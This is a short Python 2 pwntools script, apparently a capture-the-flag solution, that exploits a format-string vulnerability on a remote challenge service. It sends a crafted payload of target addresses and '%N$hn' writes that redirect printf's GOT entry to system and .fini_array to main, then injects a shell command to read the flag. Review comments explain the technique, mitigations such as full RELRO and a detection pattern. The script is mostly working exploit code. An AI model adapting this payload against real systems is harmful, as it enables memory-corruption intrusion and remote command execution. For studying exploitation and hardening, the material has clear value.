#!/usr/bin/python
# Format-string exploit script for a CTF challenge: the remote service
# (pwn2.chal.ctf.westerns.tokyo:16317) passes the line it receives to printf
# as the format string, and the positional "%N$hn" directives below turn that
# into four 16-bit writes (two per target address, see the notes below).
# vulnerable overwrite is at
# overwrite is at .fini_array
# 0x08049934 & 36 (half-write each)
# main location is 0x080485ED
# printf got is 0x08049a38
# system got is 0x08049a48
# system@PLT = 0x8048496
# the vulnerability is twofold:
# 1. overwrite printf with system
# 2. overwrite .fini_array[0] wth main
# 3. pass 'ls' to system
# win...
# NOTE(review): "twofold" is followed by three steps, and the string actually
# sent at the end of this script is not 'ls' — presumably stale notes.
# NOTE(review): both writes require the GOT and .fini_array to be writable at
# run time, i.e. a binary linked without full RELRO; full RELRO (and
# FORTIFY_SOURCE, which rejects %n in a non-constant format string) would each
# stop this technique. Detection-wise, the payload is recognisable by the
# "%<width>x%<slot>$hn" pattern and the very large field widths.
# | 12 || 13 || 14 || 15 |
# The four little-endian addresses in `out`, in printf argument-slot order:
#   slot 12: 0x08049a3a  (printf GOT entry + 2, receives the high half)
#   slot 13: 0x08049a38  (printf GOT entry,     receives the low half)
#   slot 14: 0x08049936  (.fini_array[0] + 2,   receives the high half)
#   slot 15: 0x08049934  (.fini_array[0],       receives the low half)
# The leading space's purpose is not recorded here — TODO confirm (it changes
# the byte count every later "%<width>x" is tuned against).
out = " \x3a\x9a\x04\x08\x38\x9a\x04\x08\x36\x99\x04\x08\x34\x99\x04\x08"
# out += "%12$hn"
# out += "%14$hn"
# Each "%<width>x" raises printf's running output count so that the following
# "%N$hn" stores the intended 16-bit value. The widths are cumulative: changing
# any one of them, or the prefix length, shifts every later write.
out += "%2016x" # pad %n value to 0804
out += "%12$hn" # write 0x0804 (high half) into printf's GOT entry, slot 12
out += "%14$hn" # write 0x0804 (high half) into .fini_array[0], slot 14
out += "%31890x" # pad %n value to 8496 (low half of system@PLT)
out += "%13$hn" # write 0x8496 (low half) into printf's GOT entry, slot 13
out += "%343x" # pad %n value to 85ED (low half of main)
out += "%15$hn" # write 0x85ED (low half) into .fini_array[0], slot 15
# Text after the newline is what the redirected printf -> system call is
# meant to receive; NOTE(review): this is not the 'ls' named in the header.
out += "\nhello || cat flag || ("
import pwn  # pwntools (third-party); imported mid-script, after payload build
p = pwn.remote("pwn2.chal.ctf.westerns.tokyo",16317)
print p.recv()  # Python 2 print statement: the script does not run unchanged under Python 3
p.sendline(out)
p.interactive()